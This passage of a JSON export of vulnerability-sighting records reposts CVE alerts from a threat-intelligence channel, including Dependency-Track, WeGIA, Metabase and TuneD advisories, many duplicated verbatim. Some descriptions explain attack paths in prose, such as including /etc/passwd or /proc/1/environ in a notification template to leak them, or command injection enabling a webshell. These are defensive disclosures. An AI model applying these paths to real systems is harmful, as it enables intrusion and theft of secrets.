Dependency-Track is a component analysis platform that allows organizations to identify and reduce risk in the software supply chain. Dependency-Track allows users with the `SYSTEM_CONFIGURATION` permission to customize notification templates. Templates are evaluated using the Pebble template engine. Pebble supports an `include` tag, which allows template authors to include the content of arbitrary files upon evaluation. Prior to version 4.12.6, users of Dependency-Track with the `SYSTEM_CONFIGURATION` permission can abuse the `include` tag by crafting notification templates that `include` sensitive local files, such as `/etc/passwd` or `/proc/1/environ`. By configuring such a template for a notification rule (aka \"Alert\"), and having it send notifications to a destination controlled by the actor, sensitive information may be leaked. The issue has been fixed in Dependency-Track 4.12.6. In fixed versions, the `include` tag can no longer be used. Usage of the tag will cause template evaluation to fail. As a workaround, avoid assigning the `SYSTEM_CONFIGURATION` permission to untrusted users. The `SYSTEM_CONFIGURATION` permission per default is only granted to members of the `Administrators` team. Assigning this permission to non-administrative users or teams is a security risk in itself, and highly discouraged.\n\ud83d\udccf Published: 2025-02-24T20:59:50.974Z\n\ud83d\udccf Modified: 2025-02-24T20:59:50.974Z\n\ud83d\udd17 References:\n1. https://github.com/DependencyTrack/dependency-track/security/advisories/GHSA-9582-88hr-54w3\n2. https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-p75g-cxfj-7wrx\n3. https://github.com/PebbleTemplates/pebble/issues/680\n4. https://github.com/DependencyTrack/dependency-track/pull/4684\n5. https://github.com/DependencyTrack/dependency-track/pull/4685\n6. https://pebbletemplates.io/wiki/tag/include", "creation_timestamp": "2025-02-24T21:25:44.000000Z"}, {"uuid": "efc23d0c-b701-4784-86e5-5d521658a853", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XW6W-X28R-2P5C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5231", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27140\n\ud83d\udd25 CVSS Score: 10 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: WeGIA is a Web manager for charitable institutions. An OS Command Injection vulnerability was discovered in versions prior to 3.2.15 of the WeGIA application, `importar_dump.php` endpoint. This vulnerability could allow an attacker to execute arbitrary code remotely. The command is basically a command to move a temporary file, so a webshell upload is also possible. Version 3.2.15 contains a patch for the issue.\n\ud83d\udccf Published: 2025-02-24T21:21:24.013Z\n\ud83d\udccf Modified: 2025-02-24T21:21:24.013Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xw6w-x28r-2p5c\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/7d0df8c9a0b8b7d6862bbc23dc729d73e39672a1", "creation_timestamp": "2025-02-24T22:22:23.000000Z"}, {"uuid": "e2bf053c-96c0-40b9-8089-f92b8e89b64a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6CC4-H534-XH5P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5230", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27141\n\ud83d\udd25 CVSS Score: 4.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N)\n\ud83d\udd39 Description: Metabase Enterprise Edition is the enterprise version of Metabase business intelligence and data analytics software. Starting in version 1.47.0 and prior to versions 1.50.36, 1.51.14, 1.52.11, and 1.53.2 of Metabase Enterprise Edition, users with impersonation permissions may be able to see results of cached questions, even if their permissions don\u2019t allow them to see the data. If some user runs a question which gets cached, and then an impersonated user runs that question, then the impersonated user sees the same results as the previous user. These cached results may include data the impersonated user should not have access to. This vulnerability only impacts the Enterprise Edition of Metabase and not the Open Source Edition. Versions 1.53.2, 1.52.11, 1.51.14, and 1.50.36 contains a patch. Versions on the 1.49.X, 1.48.X, and 1.47.X branches are vulnerable but do not have a patch available, so users should upgrade to a major version with an available fix. Disabling question caching is a workaround for this issue.\n\ud83d\udccf Published: 2025-02-24T22:05:14.188Z\n\ud83d\udccf Modified: 2025-02-24T22:05:14.188Z\n\ud83d\udd17 References:\n1. https://github.com/metabase/metabase/security/advisories/GHSA-6cc4-h534-xh5p\n2. https://www.metabase.com/docs/latest/configuring-metabase/caching\n3. https://www.metabase.com/docs/latest/permissions/impersonation", "creation_timestamp": "2025-02-24T22:22:23.000000Z"}, {"uuid": "ddc2fbe8-ab49-40cb-94a8-dc2312c51cce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-878M-3G6Q-594Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5301", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26488\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: OpenZeppelin Contracts is a library for secure smart contract development. The ERC721Consecutive contract designed for minting NFTs in batches does not update balances when a batch has size 1 and consists of a single token. Subsequent transfers from the receiver of that token may overflow the balance as reported by `balanceOf`. The issue exclusively presents with batches of size 1. The issue has been patched in 4.8.2.\n\ud83d\udccf Published: 2023-03-03T21:08:34.886Z\n\ud83d\udccf Modified: 2025-02-25T15:02:45.293Z\n\ud83d\udd17 References:\n1. https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-878m-3g6q-594q\n2. https://github.com/OpenZeppelin/openzeppelin-contracts/commit/167bf67ed3907f4a674043496019fa346cee7705\n3. https://github.com/OpenZeppelin/openzeppelin-contracts/releases/tag/v4.8.2", "creation_timestamp": "2025-02-25T15:23:22.000000Z"}, {"uuid": "37c554a2-6567-423c-9dff-f50695fb5372", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJHX-RRH4-J8MX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5254", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1673\n\ud83d\udd25 CVSS Score: 8.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)\n\ud83d\udd39 Description: A malicious or malformed DNS packet without a payload can cause an out-of-bounds read, resulting in a crash (denial of service) or an incorrect computation.\n\ud83d\udccf Published: 2025-02-25T07:12:13.455Z\n\ud83d\udccf Modified: 2025-02-25T07:12:13.455Z\n\ud83d\udd17 References:\n1. https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-jjhx-rrh4-j8mx", "creation_timestamp": "2025-02-25T07:22:33.000000Z"}, {"uuid": "3d5185f8-2fff-490f-b47f-3f230b7bc7aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0368", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5266", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52337\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: A log spoofing flaw was found in the Tuned package due to improper sanitization of some API arguments. This flaw allows an attacker to pass a controlled sequence of characters; newlines can be inserted into the log. Instead of the 'evil' the attacker could mimic a valid TuneD log line and trick the administrator. The quotes '' are usually used in TuneD logs citing raw user input, so there will always be the ' character ending the spoofed input, and the administrator can easily overlook this. This logged string is later used in logging and in the output of utilities, for example, `tuned-adm get_instances` or other third-party programs that use Tuned's D-Bus interface for such operations.\n\ud83d\udccf Published: 2024-11-26T15:21:17.538Z\n\ud83d\udccf Modified: 2025-02-25T11:46:21.468Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10381\n2. https://access.redhat.com/errata/RHSA-2024:10384\n3. https://access.redhat.com/errata/RHSA-2024:11161\n4. https://access.redhat.com/errata/RHSA-2025:0195\n5. https://access.redhat.com/errata/RHSA-2025:0327\n6. https://access.redhat.com/errata/RHSA-2025:0368\n7. https://access.redhat.com/errata/RHSA-2025:0879\n8. https://access.redhat.com/errata/RHSA-2025:0880\n9. https://access.redhat.com/errata/RHSA-2025:0881\n10. https://access.redhat.com/errata/RHSA-2025:1785\n11. https://access.redhat.com/errata/RHSA-2025:1802\n12. https://access.redhat.com/security/cve/CVE-2024-52337\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2324541\n14. https://security.opensuse.org/2024/11/26/tuned-instance-create.html\n15. https://www.openwall.com/lists/oss-security/2024/11/28/1", "creation_timestamp": "2025-02-25T12:24:13.000000Z"}, {"uuid": "cbeb98d0-cdf0-42cb-b1e3-dd6538800399", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1785", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5266", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52337\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: A log spoofing flaw was found in the Tuned package due to improper sanitization of some API arguments. This flaw allows an attacker to pass a controlled sequence of characters; newlines can be inserted into the log. Instead of the 'evil' the attacker could mimic a valid TuneD log line and trick the administrator. The quotes '' are usually used in TuneD logs citing raw user input, so there will always be the ' character ending the spoofed input, and the administrator can easily overlook this. This logged string is later used in logging and in the output of utilities, for example, `tuned-adm get_instances` or other third-party programs that use Tuned's D-Bus interface for such operations.\n\ud83d\udccf Published: 2024-11-26T15:21:17.538Z\n\ud83d\udccf Modified: 2025-02-25T11:46:21.468Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10381\n2. https://access.redhat.com/errata/RHSA-2024:10384\n3. https://access.redhat.com/errata/RHSA-2024:11161\n4. https://access.redhat.com/errata/RHSA-2025:0195\n5. https://access.redhat.com/errata/RHSA-2025:0327\n6. https://access.redhat.com/errata/RHSA-2025:0368\n7. https://access.redhat.com/errata/RHSA-2025:0879\n8. https://access.redhat.com/errata/RHSA-2025:0880\n9. https://access.redhat.com/errata/RHSA-2025:0881\n10. https://access.redhat.com/errata/RHSA-2025:1785\n11. https://access.redhat.com/errata/RHSA-2025:1802\n12. https://access.redhat.com/security/cve/CVE-2024-52337\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2324541\n14. https://security.opensuse.org/2024/11/26/tuned-instance-create.html\n15. https://www.openwall.com/lists/oss-security/2024/11/28/1", "creation_timestamp": "2025-02-25T12:24:13.000000Z"}, {"uuid": "83e1ccda-f10f-46be-bdb4-8350111e4d28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6122", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5258", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-50311\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A denial of service (DoS) vulnerability was found in OpenShift. This flaw allows attackers to exploit the GraphQL batching functionality. The vulnerability arises when multiple queries can be sent within a single request, enabling an attacker to submit a request containing thousands of aliases in one query. This issue causes excessive resource consumption, leading to application unavailability for legitimate users.\n\ud83d\udccf Published: 2024-10-22T13:24:04.199Z\n\ud83d\udccf Modified: 2025-02-25T08:07:58.124Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6122\n2. https://access.redhat.com/security/cve/CVE-2024-50311\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2319379", "creation_timestamp": "2025-02-25T08:25:22.000000Z"}, {"uuid": "f44d5d66-beb2-4d56-8e37-980ad8e0cd19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9960", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "14a236c2-f80e-4389-ac71-abe96b4934b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7187", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "4f6a2450-a238-4d61-8f6f-2355a10a98c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5258", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "070e5be8-c2b5-4c51-9c82-ee6dd5bcfb7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7164", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "3deb26df-525c-47c5-b2dc-ff3f64a6aee4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4850", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "204c3c2e-f375-47e2-b92a-ee6a81a32cca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6824", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "9f52bd90-b5bc-4dba-a1cf-23c755f5d78e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6708", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. 